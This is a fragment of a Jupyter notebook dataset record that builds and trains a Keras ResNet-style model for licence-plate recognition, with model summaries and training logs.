#d+=1\n#plt.hist(image11, bins=256, range=(0.0, 1.0)) \nimg = cv2.imread(\"/home/dic/jupyter/image_var4_dt_elongated/gg.png\",0)\n#plt.hist(img.ravel(),256,[0,256])\n#plt.show()\n#cv2.calcHist([img],[0],None,[256],[0,256])\n\n#plt.show()\n", "0.0454396958942\n0.0151465652981\n0.0378664132452\n0.302931305961\n0.23477176212\n0.507409937485\n0.727035134308\n0.348371001856\n0.39381069775\n0.0378664132452\n6.39185055579\n5.50577648585\n7.1188856901\n1.27988476769\n0.0302931305961\n0.00757328264904\n0.492263372187\n0.0454396958942\n0.128745805034\n0.0681595438413\n0.371090849803\n0.302931305961\n0.681595438413\n0.408957263048\n0.636155742519\n0.340797719207\n0.310504588611\n8.11098571712\n7.53541623579\n10.2617979894\n2.75667488425\n0.0757328264904\n0.00757328264904\n0.461970241591\n0.0378664132452\n0.0984526744375\n0.181758783577\n0.749754982255\n0.408957263048\n0.363517567154\n0.507409937485\n0.70431528636\n0.265064892716\n0.227198479471\n8.14127884772\n7.49754982255\n14.1165988578\n4.30162454465\n0.0757328264904\n0.00757328264904\n0.0833061091394\n0.0227198479471\n0.0605862611923\n0.0681595438413\n0.23477176212\n0.242345044769\n0.0530129785433\n0.454396958942\n0.484690089538\n0.424103828346\n0.0605862611923\n6.27825131605\n6.53574292612\n14.457396577\n5.22556502784\n0.0378664132452\n0.00757328264904\n0.0378664132452\n0.0378664132452\n0.0605862611923\n0.0908793917884\n0.0605862611923\n0.257491610067\n0.15903893563\n0.151465652981\n0.00757328264904\n4.51367645883\n5.9298803142\n13.3744171582\n4.86204746068\n0.00757328264904\n0.0302931305961\n0.113599239736\n0.0757328264904\n0.212051914173\n0.106025957087\n0.0530129785433\n0.302931305961\n0.0151465652981\n6.67963529645\n6.11163909777\n15.6766950835\n7.73989486732\n0.0151465652981\n0.113599239736\n0.0454396958942\n0.340797719207\n2.21139853352\n2.23411838147\n6.52059636082\n4.12743904373\n0.0454396958942\n0.0454396958942\n0.121172522385\n0.0302931305961\n0.0227198479471\n0.00757328264904\n0.00757328264904\n0.0227198479471\n0.121172522385\n0.143892370332\n0.143892370332\n0.128745805034\n0.477116806889\n0.0378664132452\n0.0681595438413\n0.265064892716\n1.66612218279\n1.12841911471\n1.61310920424\n0.272638175365\n0.0227198479471\n0.0530129785433\n0.15903893563\n0.204478631524\n0.143892370332\n0.46954352424\n0.333224436558\n0.408957263048\n0.530129785433\n2.90056725458\n2.46131686094\n4.87719402598\n0.598289329274\n0.00757328264904\n0.0151465652981\n0.0151465652981\n0.0605862611923\n0.0984526744375\n0.0908793917884\n0.363517567154\n0.727035134308\n0.249918327418\n0.0757328264904\n3.76392147657\n2.68851534041\n4.77116806889\n0.401383980399\n" ], [ "a=[]\n\nfor i in range(0,2880,10):\n print(i,end=',')\n ", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code" ] ]
e72ffd4bbbd2f5fc6f3328a76372036c95c71d4a
345,530
ipynb
Jupyter Notebook
car-management/recognitionalgorithm/.ipynb_checkpoints/resnet_1_0-checkpoint.ipynb
treeandgrass/Miscellaneous
377660870dc9559b1aa7bba1d78c67ad256ed4a7
[ "MIT" ]
null
null
null
car-management/recognitionalgorithm/.ipynb_checkpoints/resnet_1_0-checkpoint.ipynb
treeandgrass/Miscellaneous
377660870dc9559b1aa7bba1d78c67ad256ed4a7
[ "MIT" ]
null
null
null
car-management/recognitionalgorithm/.ipynb_checkpoints/resnet_1_0-checkpoint.ipynb
treeandgrass/Miscellaneous
377660870dc9559b1aa7bba1d78c67ad256ed4a7
[ "MIT" ]
null
null
null
249.840926
122,852
0.858773
[ [ [ "from keras.models import Model\nfrom keras.layers import Dense, Input, BatchNormalization, Activation, Conv2D, MaxPooling2D, AveragePooling2D, Dropout\nfrom keras.layers import Add, Reshape, Flatten\nfrom keras import backend as K\nfrom keras.utils import plot_model\nfrom keras.utils.vis_utils import model_to_dot\nfrom IPython.display import display\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom ImageUtils import ImageUtils\nimport pickle\nfrom keras import regularizers", "D:\\sf\\conda\\lib\\site-packages\\h5py\\__init__.py:36: FutureWarning: Conversion of the second argument of issubdtype from `float` to `np.floating` is deprecated. In future, it will be treated as `np.float64 == np.dtype(float).type`.\n from ._conv import register_converters as _register_converters\nUsing TensorFlow backend.\n" ], [ "#基本常量\nsourceFolder = 'D:/jupyter/car-management/recognitionalgorithm/dataset/rimages'\ntargetFolder = 'D:/jupyter/car-management/recognitionalgorithm/dataset/rimagesResize320'\nroot = 'D:/jupyter/car-management/recognitionalgorithm/dataset'\nXfilename = 'licenseplateL.npy'\nYfilename = 'label.npy'\nfilename = '字典.xlsx'", "_____no_output_____" ], [ "#加载图片数据\nutils = ImageUtils()", "_____no_output_____" ], [ "#检查图片数据\nX_train, Y_train = utils.load(root, Xfilename, Yfilename)\nprint(X_train.shape)\nprint(Y_train.shape)\nprint(utils.getLabel(root, filename, Y_train[10]))\nplt.imshow(X_train[10])", "(1222, 320, 320)\n(1222, 7)\n云D86999\n" ], [ "def identify_block(X, filters, name, strides):\n conv_name = 'identify_conv' + str(name)\n bn_name = 'identify_bn_name' + str(name)\n activation_name = 'identify_activation_name' + str(name)\n add_name = 'identify_add' + str(name)\n skip_name = 'identify_skip' + str(name)\n \n f_1_1, f_1_2, skip_1_1 = filters\n \n '''first unit'''\n conv_1_1 = Conv2D(f_1_1, (3, 3), strides = strides, padding = 'same', name = conv_name + '_1_1', kernel_initializer = 'truncated_normal', kernel_regularizer = regularizers.l2(0.001))(X)\n bn_1_1 = BatchNormalization(name = bn_name + '_1_1')(conv_1_1)\n activation_1_1 = Activation('relu', name = activation_name + '_1_1')(bn_1_1)\n \n '''second unit'''\n conv_2_1 = Conv2D(f_1_2, (3, 3), strides = strides, padding = 'same', name = conv_name + '_2_1', kernel_initializer = 'truncated_normal', kernel_regularizer = regularizers.l2(0.001))(activation_1_1)\n bn_2_1 = BatchNormalization(name = bn_name + '_2_1')(conv_2_1)\n activation_2_1 = Activation('relu', name = activation_name + '_2_1')(bn_2_1)\n \n '''skip unit'''\n skip_strides = 2 * strides\n if strides == 1:\n skip_strides = 1\n \n conv_skip_1_1 = Conv2D(skip_1_1, (3, 3), strides = skip_strides, padding = 'same', name = skip_name + '_1_1', kernel_initializer = 'truncated_normal', kernel_regularizer = regularizers.l2(0.001))(X)\n \n identify = Add(name = add_name + '_1_1')([activation_2_1, conv_skip_1_1])\n \n return identify", "_____no_output_____" ], [ "'''build convlution block'''\ndef bottleneck_block(X, filters, name, strides):\n conv_name = 'bk_conv' + str(name)\n bn_name = 'bk_bn' + str(name)\n activation_name = 'bk_an' + str(name)\n add_name = 'bk_add' + str(name)\n skip_name = 'bk_sk' + str(name)\n \n f_1_1, f_1_2, f_1_3, skip_1_1 = filters\n \n '''first unit'''\n conv_1_1 = Conv2D(f_1_1, (1, 1), strides = strides, padding = 'same', name = conv_name + '1_1', kernel_initializer = 'truncated_normal', kernel_regularizer = regularizers.l2(0.001))(X)\n bn_1_1 = BatchNormalization(name = bn_name + '1_1')(conv_1_1)\n activation_1_1 = Activation('relu', name = activation_name + '1_1')(bn_1_1)\n \n '''second unit'''\n conv_2_1 = Conv2D(f_1_2, (3, 3), strides = strides, padding = 'same', name = conv_name + '2_1', kernel_initializer = 'truncated_normal', kernel_regularizer = regularizers.l2(0.001))(activation_1_1)\n bn_2_1 = BatchNormalization(name = bn_name + '2_1')(conv_2_1)\n activation_2_1 = Activation('relu', name = activation_name + '2_1')(bn_2_1)\n \n '''skip unit'''\n conv_3_1 = Conv2D(f_1_3, (1, 1), strides = strides, padding = 'same', name = conv_name + '3_1', kernel_initializer = 'truncated_normal', kernel_regularizer = regularizers.l2(0.001))(activation_2_1)\n bn_3_1 = BatchNormalization(name = bn_name + '3_1')(conv_3_1)\n activation_3_1 = Activation('relu', name = activation_name + '3_1')(bn_3_1)\n \n '''skip unit'''\n skip_strides = int(pow(strides, 3))\n if strides == 1:\n skip_strides = 1\n conv_skip_1_1 = Conv2D(skip_1_1, (3, 3), strides = skip_strides, name = skip_name + 'c_1_1', padding = 'same', kernel_initializer = 'truncated_normal', kernel_regularizer = regularizers.l2(0.001))(X)\n bn_skip_1_1 = BatchNormalization(name = skip_name + '_1_1')(conv_skip_1_1)\n activation_skip_1_1 = Activation('relu', name = skip_name + 'an_1_1')(bn_skip_1_1)\n \n \n bottleneck = Add(name = add_name + '_1_1')([activation_3_1, activation_skip_1_1])\n \n return bottleneck", "_____no_output_____" ], [ "'''build full network'''\ndef resnet(input_shape, full_conncet_nums = (512, 7)):\n '''inputs'''\n inputs = Input(shape = input_shape)\n \n \n '''128 filters, identify name: 1 256 filters, bottleneck name: 1'''\n bottleneck_block_1 = bottleneck_block(inputs, filters = (128, 128, 128, 128), name = 1, strides = 2)\n identify_block_1 = identify_block(bottleneck_block_1, filters = (256, 256, 256), name = 1, strides = 1)\n \n \n '''max pooling'''\n mp2d = MaxPooling2D(pool_size = (2, 2))(identify_block_1)\n \n '''relu activation'''\n an_block_1 = Activation('relu', name = 'model_an_1')(mp2d)\n \n '''dropout'''\n d_bottleneck_block_1 = Dropout(0.25)(an_block_1)\n \n '''256 filters, identify name: 2 512 filters, bottleneck name: 2'''\n bottleneck_block_2 = bottleneck_block(d_bottleneck_block_1, filters = (512, 512, 512, 512), name = 2, strides = 1)\n identify_block_2 = identify_block(bottleneck_block_2, filters = (1024, 1024, 1024), name = 2, strides = 1)\n \n '''relu activation'''\n an_block_2 = Activation('relu', name = 'model_an_2')(identify_block_2)\n \n '''dropout'''\n d_bottleneck_block_2 = Dropout(0.25)(an_block_2)\n \n '''1024 filters, identify name: 2 2048 filters, bottleneck name: 2'''\n# bottleneck_block_3 = bottleneck_block(d_bottleneck_block_2, filters = (1024, 1024, 1024, 1024), name = 3, strides = 2)\n# identify_block_3 = identify_block(d_bottleneck_block_2, filters = (2048, 2048, 2048), name = 3, strides = 2)\n \n '''average pooling'''\n ap2d = AveragePooling2D(pool_size = (1, 1))(d_bottleneck_block_2)\n \n '''dropout 0.05'''\n d_bottleneck_block_3 = Dropout(0.5)(ap2d)\n \n \n '''flatten'''\n flatten = Flatten()(d_bottleneck_block_3)\n \n '''full connect params'''\n full_connect_num_1, full_connect_num_2 = full_conncet_nums\n \n '''full connect layer 1'''\n full_connect1 = Dense(full_connect_num_1, activation = 'relu', kernel_initializer = 'glorot_normal', kernel_regularizer = regularizers.l2(0.1))(flatten)\n \n \n '''full conncet layer 2'''\n end_full_connect = Dense(full_connect_num_2, activation = 'softmax', kernel_initializer = 'glorot_normal', kernel_regularizer = regularizers.l2(0.1))(full_connect1)\n\n '''build model'''\n model = Model(inputs = inputs, outputs = end_full_connect)\n \n return model", "_____no_output_____" ], [ "'''build model obejct'''\nmodel = resnet(input_shape = (320, 320, 3))\nmodel.summary()", "__________________________________________________________________________________________________\nLayer (type) Output Shape Param # Connected to \n==================================================================================================\ninput_2 (InputLayer) (None, 320, 320, 3) 0 \n__________________________________________________________________________________________________\nbk_conv11_1 (Conv2D) (None, 160, 160, 128 512 input_2[0][0] \n__________________________________________________________________________________________________\nbk_bn11_1 (BatchNormalization) (None, 160, 160, 128 512 bk_conv11_1[0][0] \n__________________________________________________________________________________________________\nbk_an11_1 (Activation) (None, 160, 160, 128 0 bk_bn11_1[0][0] \n__________________________________________________________________________________________________\nbk_conv12_1 (Conv2D) (None, 80, 80, 128) 147584 bk_an11_1[0][0] \n__________________________________________________________________________________________________\nbk_bn12_1 (BatchNormalization) (None, 80, 80, 128) 512 bk_conv12_1[0][0] \n__________________________________________________________________________________________________\nbk_an12_1 (Activation) (None, 80, 80, 128) 0 bk_bn12_1[0][0] \n__________________________________________________________________________________________________\nbk_conv13_1 (Conv2D) (None, 40, 40, 128) 16512 bk_an12_1[0][0] \n__________________________________________________________________________________________________\nbk_sk1c_1_1 (Conv2D) (None, 40, 40, 128) 3584 input_2[0][0] \n__________________________________________________________________________________________________\nbk_bn13_1 (BatchNormalization) (None, 40, 40, 128) 512 bk_conv13_1[0][0] \n__________________________________________________________________________________________________\nbk_sk1_1_1 (BatchNormalization) (None, 40, 40, 128) 512 bk_sk1c_1_1[0][0] \n__________________________________________________________________________________________________\nbk_an13_1 (Activation) (None, 40, 40, 128) 0 bk_bn13_1[0][0] \n__________________________________________________________________________________________________\nbk_sk1an_1_1 (Activation) (None, 40, 40, 128) 0 bk_sk1_1_1[0][0] \n__________________________________________________________________________________________________\nbk_add1_1_1 (Add) (None, 40, 40, 128) 0 bk_an13_1[0][0] \n bk_sk1an_1_1[0][0] \n__________________________________________________________________________________________________\nidentify_conv1_1_1 (Conv2D) (None, 40, 40, 256) 295168 bk_add1_1_1[0][0] \n__________________________________________________________________________________________________\nidentify_bn_name1_1_1 (BatchNor (None, 40, 40, 256) 1024 identify_conv1_1_1[0][0] \n__________________________________________________________________________________________________\nidentify_activation_name1_1_1 ( (None, 40, 40, 256) 0 identify_bn_name1_1_1[0][0] \n__________________________________________________________________________________________________\nidentify_conv1_2_1 (Conv2D) (None, 40, 40, 256) 590080 identify_activation_name1_1_1[0][\n__________________________________________________________________________________________________\nidentify_bn_name1_2_1 (BatchNor (None, 40, 40, 256) 1024 identify_conv1_2_1[0][0] \n__________________________________________________________________________________________________\nidentify_activation_name1_2_1 ( (None, 40, 40, 256) 0 identify_bn_name1_2_1[0][0] \n__________________________________________________________________________________________________\nidentify_skip1_1_1 (Conv2D) (None, 40, 40, 256) 295168 bk_add1_1_1[0][0] \n__________________________________________________________________________________________________\nidentify_add1_1_1 (Add) (None, 40, 40, 256) 0 identify_activation_name1_2_1[0][\n identify_skip1_1_1[0][0] \n__________________________________________________________________________________________________\nmax_pooling2d_2 (MaxPooling2D) (None, 20, 20, 256) 0 identify_add1_1_1[0][0] \n__________________________________________________________________________________________________\nmodel_an_1 (Activation) (None, 20, 20, 256) 0 max_pooling2d_2[0][0] \n__________________________________________________________________________________________________\ndropout_4 (Dropout) (None, 20, 20, 256) 0 model_an_1[0][0] \n__________________________________________________________________________________________________\nbk_conv21_1 (Conv2D) (None, 20, 20, 512) 131584 dropout_4[0][0] \n__________________________________________________________________________________________________\nbk_bn21_1 (BatchNormalization) (None, 20, 20, 512) 2048 bk_conv21_1[0][0] \n__________________________________________________________________________________________________\nbk_an21_1 (Activation) (None, 20, 20, 512) 0 bk_bn21_1[0][0] \n__________________________________________________________________________________________________\nbk_conv22_1 (Conv2D) (None, 20, 20, 512) 2359808 bk_an21_1[0][0] \n__________________________________________________________________________________________________\nbk_bn22_1 (BatchNormalization) (None, 20, 20, 512) 2048 bk_conv22_1[0][0] \n__________________________________________________________________________________________________\nbk_an22_1 (Activation) (None, 20, 20, 512) 0 bk_bn22_1[0][0] \n__________________________________________________________________________________________________\nbk_conv23_1 (Conv2D) (None, 20, 20, 512) 262656 bk_an22_1[0][0] \n__________________________________________________________________________________________________\nbk_sk2c_1_1 (Conv2D) (None, 20, 20, 512) 1180160 dropout_4[0][0] \n__________________________________________________________________________________________________\nbk_bn23_1 (BatchNormalization) (None, 20, 20, 512) 2048 bk_conv23_1[0][0] \n__________________________________________________________________________________________________\nbk_sk2_1_1 (BatchNormalization) (None, 20, 20, 512) 2048 bk_sk2c_1_1[0][0] \n__________________________________________________________________________________________________\nbk_an23_1 (Activation) (None, 20, 20, 512) 0 bk_bn23_1[0][0] \n__________________________________________________________________________________________________\nbk_sk2an_1_1 (Activation) (None, 20, 20, 512) 0 bk_sk2_1_1[0][0] \n__________________________________________________________________________________________________\nbk_add2_1_1 (Add) (None, 20, 20, 512) 0 bk_an23_1[0][0] \n bk_sk2an_1_1[0][0] \n__________________________________________________________________________________________________\nidentify_conv2_1_1 (Conv2D) (None, 20, 20, 1024) 4719616 bk_add2_1_1[0][0] \n__________________________________________________________________________________________________\nidentify_bn_name2_1_1 (BatchNor (None, 20, 20, 1024) 4096 identify_conv2_1_1[0][0] \n__________________________________________________________________________________________________\nidentify_activation_name2_1_1 ( (None, 20, 20, 1024) 0 identify_bn_name2_1_1[0][0] \n__________________________________________________________________________________________________\nidentify_conv2_2_1 (Conv2D) (None, 20, 20, 1024) 9438208 identify_activation_name2_1_1[0][\n__________________________________________________________________________________________________\nidentify_bn_name2_2_1 (BatchNor (None, 20, 20, 1024) 4096 identify_conv2_2_1[0][0] \n__________________________________________________________________________________________________\nidentify_activation_name2_2_1 ( (None, 20, 20, 1024) 0 identify_bn_name2_2_1[0][0] \n__________________________________________________________________________________________________\nidentify_skip2_1_1 (Conv2D) (None, 20, 20, 1024) 4719616 bk_add2_1_1[0][0] \n__________________________________________________________________________________________________\nidentify_add2_1_1 (Add) (None, 20, 20, 1024) 0 identify_activation_name2_2_1[0][\n identify_skip2_1_1[0][0] \n__________________________________________________________________________________________________\nmodel_an_2 (Activation) (None, 20, 20, 1024) 0 identify_add2_1_1[0][0] \n__________________________________________________________________________________________________\ndropout_5 (Dropout) (None, 20, 20, 1024) 0 model_an_2[0][0] \n__________________________________________________________________________________________________\naverage_pooling2d_2 (AveragePoo (None, 20, 20, 1024) 0 dropout_5[0][0] \n__________________________________________________________________________________________________\ndropout_6 (Dropout) (None, 20, 20, 1024) 0 average_pooling2d_2[0][0] \n__________________________________________________________________________________________________\nflatten_2 (Flatten) (None, 409600) 0 dropout_6[0][0] \n__________________________________________________________________________________________________\ndense_9 (Dense) (None, 512) 209715712 flatten_2[0][0] \n__________________________________________________________________________________________________\ndense_10 (Dense) (None, 7) 3591 dense_9[0][0] \n__________________________________________________________________________________________________\ndense_11 (Dense) (None, 7) 3591 dense_9[0][0] \n__________________________________________________________________________________________________\ndense_12 (Dense) (None, 7) 3591 dense_9[0][0] \n__________________________________________________________________________________________________\ndense_13 (Dense) (None, 7) 3591 dense_9[0][0] \n__________________________________________________________________________________________________\ndense_14 (Dense) (None, 7) 3591 dense_9[0][0] \n__________________________________________________________________________________________________\ndense_15 (Dense) (None, 7) 3591 dense_9[0][0] \n__________________________________________________________________________________________________\ndense_16 (Dense) (None, 7) 3591 dense_9[0][0] \n==================================================================================================\nTotal params: 233,921,585\nTrainable params: 233,911,345\nNon-trainable params: 10,240\n__________________________________________________________________________________________________\n" ], [ "plot_model(model, to_file='resnet_model1.png', show_shapes=True, show_layer_names=True, rankdir='TB')", "_____no_output_____" ], [ "'''test model'''\ninputs = np.random.rand(5, 320, 320, 3)\nmodel.predict(inputs)", "_____no_output_____" ], [ "'''compile model'''\nmodel.compile(loss = 'mean_squared_error', optimizer = 'adadelta', metrics = ['accuracy'])", "_____no_output_____" ], [ "'''train model'''\nmodel.fit(X_train, Y_train, batch_size = 8, epochs = 5)", "Epoch 1/5\n1225/1225 [==============================] - 17361s 14s/step - loss: 448879.5567 - acc: 0.0563\nEpoch 2/5\n1225/1225 [==============================] - 17694s 14s/step - loss: 1059.4438 - acc: 0.0498\nEpoch 3/5\n1225/1225 [==============================] - 17632s 14s/step - loss: 1057.5573 - acc: 0.0531\nEpoch 4/5\n1225/1225 [==============================] - 17524s 14s/step - loss: 1052.4273 - acc: 0.0637\nEpoch 5/5\n1225/1225 [==============================] - 17273s 14s/step - loss: 1132.2507 - acc: 0.0506\n" ], [ "model.summary()", "__________________________________________________________________________________________________\nLayer (type) Output Shape Param # Connected to \n==================================================================================================\ninput_1 (InputLayer) (None, 320, 320) 0 \n__________________________________________________________________________________________________\nreshape_1 (Reshape) (None, 320, 320, 1) 0 input_1[0][0] \n__________________________________________________________________________________________________\nconv2d_1 (Conv2D) (None, 157, 157, 64) 3200 reshape_1[0][0] \n__________________________________________________________________________________________________\nconv2d_2 (Conv2D) (None, 157, 157, 64) 36928 conv2d_1[0][0] \n__________________________________________________________________________________________________\nactivation_1 (Activation) (None, 157, 157, 64) 0 conv2d_2[0][0] \n__________________________________________________________________________________________________\ndropout_1 (Dropout) (None, 157, 157, 64) 0 activation_1[0][0] \n__________________________________________________________________________________________________\nconv2d_4 (Conv2D) (None, 157, 157, 64) 36928 conv2d_1[0][0] \n__________________________________________________________________________________________________\nconv2d_3 (Conv2D) (None, 157, 157, 64) 36928 dropout_1[0][0] \n__________________________________________________________________________________________________\nadd_1 (Add) (None, 157, 157, 64) 0 conv2d_4[0][0] \n conv2d_3[0][0] \n__________________________________________________________________________________________________\nactivation_2 (Activation) (None, 157, 157, 64) 0 add_1[0][0] \n__________________________________________________________________________________________________\ndropout_2 (Dropout) (None, 157, 157, 64) 0 activation_2[0][0] \n__________________________________________________________________________________________________\nconv2d_5 (Conv2D) (None, 157, 157, 64) 36928 dropout_2[0][0] \n__________________________________________________________________________________________________\nactivation_3 (Activation) (None, 157, 157, 64) 0 conv2d_5[0][0] \n__________________________________________________________________________________________________\ndropout_3 (Dropout) (None, 157, 157, 64) 0 activation_3[0][0] \n__________________________________________________________________________________________________\nconv2d_7 (Conv2D) (None, 157, 157, 64) 36928 dropout_2[0][0] \n__________________________________________________________________________________________________\nconv2d_6 (Conv2D) (None, 157, 157, 64) 36928 dropout_3[0][0] \n__________________________________________________________________________________________________\nadd_2 (Add) (None, 157, 157, 64) 0 conv2d_7[0][0] \n conv2d_6[0][0] \n__________________________________________________________________________________________________\nactivation_4 (Activation) (None, 157, 157, 64) 0 add_2[0][0] \n__________________________________________________________________________________________________\ndropout_4 (Dropout) (None, 157, 157, 64) 0 activation_4[0][0] \n__________________________________________________________________________________________________\nconv2d_8 (Conv2D) (None, 157, 157, 64) 36928 dropout_4[0][0] \n__________________________________________________________________________________________________\nactivation_5 (Activation) (None, 157, 157, 64) 0 conv2d_8[0][0] \n__________________________________________________________________________________________________\ndropout_5 (Dropout) (None, 157, 157, 64) 0 activation_5[0][0] \n__________________________________________________________________________________________________\nconv2d_10 (Conv2D) (None, 157, 157, 64) 36928 dropout_4[0][0] \n__________________________________________________________________________________________________\nconv2d_9 (Conv2D) (None, 157, 157, 64) 36928 dropout_5[0][0] \n__________________________________________________________________________________________________\nadd_3 (Add) (None, 157, 157, 64) 0 conv2d_10[0][0] \n conv2d_9[0][0] \n__________________________________________________________________________________________________\nactivation_6 (Activation) (None, 157, 157, 64) 0 add_3[0][0] \n__________________________________________________________________________________________________\ndropout_6 (Dropout) (None, 157, 157, 64) 0 activation_6[0][0] \n__________________________________________________________________________________________________\nconv2d_11 (Conv2D) (None, 157, 157, 64) 36928 dropout_6[0][0] \n__________________________________________________________________________________________________\nactivation_7 (Activation) (None, 157, 157, 64) 0 conv2d_11[0][0] \n__________________________________________________________________________________________________\ndropout_7 (Dropout) (None, 157, 157, 64) 0 activation_7[0][0] \n__________________________________________________________________________________________________\nconv2d_13 (Conv2D) (None, 157, 157, 64) 36928 dropout_6[0][0] \n__________________________________________________________________________________________________\nconv2d_12 (Conv2D) (None, 157, 157, 64) 36928 dropout_7[0][0] \n__________________________________________________________________________________________________\nadd_4 (Add) (None, 157, 157, 64) 0 conv2d_13[0][0] \n conv2d_12[0][0] \n__________________________________________________________________________________________________\nactivation_8 (Activation) (None, 157, 157, 64) 0 add_4[0][0] \n__________________________________________________________________________________________________\ndropout_8 (Dropout) (None, 157, 157, 64) 0 activation_8[0][0] \n__________________________________________________________________________________________________\nconv2d_14 (Conv2D) (None, 157, 157, 64) 36928 dropout_8[0][0] \n__________________________________________________________________________________________________\nactivation_9 (Activation) (None, 157, 157, 64) 0 conv2d_14[0][0] \n__________________________________________________________________________________________________\ndropout_9 (Dropout) (None, 157, 157, 64) 0 activation_9[0][0] \n__________________________________________________________________________________________________\nconv2d_16 (Conv2D) (None, 157, 157, 64) 36928 dropout_8[0][0] \n__________________________________________________________________________________________________\nconv2d_15 (Conv2D) (None, 157, 157, 64) 36928 dropout_9[0][0] \n__________________________________________________________________________________________________\nadd_5 (Add) (None, 157, 157, 64) 0 conv2d_16[0][0] \n conv2d_15[0][0] \n__________________________________________________________________________________________________\nactivation_10 (Activation) (None, 157, 157, 64) 0 add_5[0][0] \n__________________________________________________________________________________________________\ndropout_10 (Dropout) (None, 157, 157, 64) 0 activation_10[0][0] \n__________________________________________________________________________________________________\nconv2d_17 (Conv2D) (None, 157, 157, 64) 4160 dropout_10[0][0] \n__________________________________________________________________________________________________\nactivation_11 (Activation) (None, 157, 157, 64) 0 conv2d_17[0][0] \n__________________________________________________________________________________________________\nconv2d_19 (Conv2D) (None, 157, 157, 64) 36928 activation_11[0][0] \n__________________________________________________________________________________________________\nactivation_12 (Activation) (None, 157, 157, 64) 0 conv2d_19[0][0] \n__________________________________________________________________________________________________\nconv2d_20 (Conv2D) (None, 157, 157, 256 147712 activation_12[0][0] \n__________________________________________________________________________________________________\nconv2d_18 (Conv2D) (None, 157, 157, 256 16640 dropout_10[0][0] \n__________________________________________________________________________________________________\nadd_6 (Add) (None, 157, 157, 256 0 conv2d_20[0][0] \n conv2d_18[0][0] \n__________________________________________________________________________________________________\nactivation_13 (Activation) (None, 157, 157, 256 0 add_6[0][0] \n__________________________________________________________________________________________________\ndropout_11 (Dropout) (None, 157, 157, 256 0 activation_13[0][0] \n__________________________________________________________________________________________________\nconv2d_21 (Conv2D) (None, 157, 157, 64) 16448 dropout_11[0][0] \n__________________________________________________________________________________________________\nactivation_14 (Activation) (None, 157, 157, 64) 0 conv2d_21[0][0] \n__________________________________________________________________________________________________\nconv2d_23 (Conv2D) (None, 157, 157, 64) 36928 activation_14[0][0] \n__________________________________________________________________________________________________\nactivation_15 (Activation) (None, 157, 157, 64) 0 conv2d_23[0][0] \n__________________________________________________________________________________________________\nconv2d_24 (Conv2D) (None, 157, 157, 256 147712 activation_15[0][0] \n__________________________________________________________________________________________________\nconv2d_22 (Conv2D) (None, 157, 157, 256 65792 dropout_11[0][0] \n__________________________________________________________________________________________________\nadd_7 (Add) (None, 157, 157, 256 0 conv2d_24[0][0] \n conv2d_22[0][0] \n__________________________________________________________________________________________________\nactivation_16 (Activation) (None, 157, 157, 256 0 add_7[0][0] \n__________________________________________________________________________________________________\ndropout_12 (Dropout) (None, 157, 157, 256 0 activation_16[0][0] \n__________________________________________________________________________________________________\nconv2d_25 (Conv2D) (None, 157, 157, 64) 16448 dropout_12[0][0] \n__________________________________________________________________________________________________\nactivation_17 (Activation) (None, 157, 157, 64) 0 conv2d_25[0][0] \n__________________________________________________________________________________________________\nconv2d_27 (Conv2D) (None, 157, 157, 64) 36928 activation_17[0][0] \n__________________________________________________________________________________________________\nactivation_18 (Activation) (None, 157, 157, 64) 0 conv2d_27[0][0] \n__________________________________________________________________________________________________\nconv2d_28 (Conv2D) (None, 157, 157, 256 147712 activation_18[0][0] \n__________________________________________________________________________________________________\nconv2d_26 (Conv2D) (None, 157, 157, 256 65792 dropout_12[0][0] \n__________________________________________________________________________________________________\nadd_8 (Add) (None, 157, 157, 256 0 conv2d_28[0][0] \n conv2d_26[0][0] \n__________________________________________________________________________________________________\nactivation_19 (Activation) (None, 157, 157, 256 0 add_8[0][0] \n__________________________________________________________________________________________________\ndropout_13 (Dropout) (None, 157, 157, 256 0 activation_19[0][0] \n__________________________________________________________________________________________________\nconv2d_29 (Conv2D) (None, 157, 157, 64) 16448 dropout_13[0][0] \n__________________________________________________________________________________________________\nactivation_20 (Activation) (None, 157, 157, 64) 0 conv2d_29[0][0] \n__________________________________________________________________________________________________\nconv2d_31 (Conv2D) (None, 157, 157, 64) 36928 activation_20[0][0] \n__________________________________________________________________________________________________\nactivation_21 (Activation) (None, 157, 157, 64) 0 conv2d_31[0][0] \n__________________________________________________________________________________________________\nconv2d_32 (Conv2D) (None, 157, 157, 256 147712 activation_21[0][0] \n__________________________________________________________________________________________________\nconv2d_30 (Conv2D) (None, 157, 157, 256 65792 dropout_13[0][0] \n__________________________________________________________________________________________________\nadd_9 (Add) (None, 157, 157, 256 0 conv2d_32[0][0] \n conv2d_30[0][0] \n__________________________________________________________________________________________________\nactivation_22 (Activation) (None, 157, 157, 256 0 add_9[0][0] \n__________________________________________________________________________________________________\ndropout_14 (Dropout) (None, 157, 157, 256 0 activation_22[0][0] \n__________________________________________________________________________________________________\nconv2d_33 (Conv2D) (None, 157, 157, 64) 16448 dropout_14[0][0] \n__________________________________________________________________________________________________\nactivation_23 (Activation) (None, 157, 157, 64) 0 conv2d_33[0][0] \n__________________________________________________________________________________________________\nconv2d_35 (Conv2D) (None, 157, 157, 64) 36928 activation_23[0][0] \n__________________________________________________________________________________________________\nactivation_24 (Activation) (None, 157, 157, 64) 0 conv2d_35[0][0] \n__________________________________________________________________________________________________\nconv2d_36 (Conv2D) (None, 157, 157, 256 147712 activation_24[0][0] \n__________________________________________________________________________________________________\nconv2d_34 (Conv2D) (None, 157, 157, 256 65792 dropout_14[0][0] \n__________________________________________________________________________________________________\nadd_10 (Add) (None, 157, 157, 256 0 conv2d_36[0][0] \n conv2d_34[0][0] \n__________________________________________________________________________________________________\nactivation_25 (Activation) (None, 157, 157, 256 0 add_10[0][0] \n__________________________________________________________________________________________________\ndropout_15 (Dropout) (None, 157, 157, 256 0 activation_25[0][0] \n__________________________________________________________________________________________________\naverage_pooling2d_1 (AveragePoo (None, 156, 156, 256 0 dropout_15[0][0] \n__________________________________________________________________________________________________\nactivation_26 (Activation) (None, 156, 156, 256 0 average_pooling2d_1[0][0] \n__________________________________________________________________________________________________\nflatten_1 (Flatten) (None, 6230016) 0 activation_26[0][0] \n__________________________________________________________________________________________________\ndense_1 (Dense) (None, 7) 43610119 flatten_1[0][0] \n==================================================================================================\nTotal params: 45,440,199\nTrainable params: 45,440,199\nNon-trainable params: 0\n__________________________________________________________________________________________________\n" ], [ "config_file = 'config_file.pickle'", "_____no_output_____" ], [ "config = model.get_config()\nwith open(config_file, 'wb') as f:\n pickle.dump({'config': config}, f)\n ", "_____no_output_____" ], [ 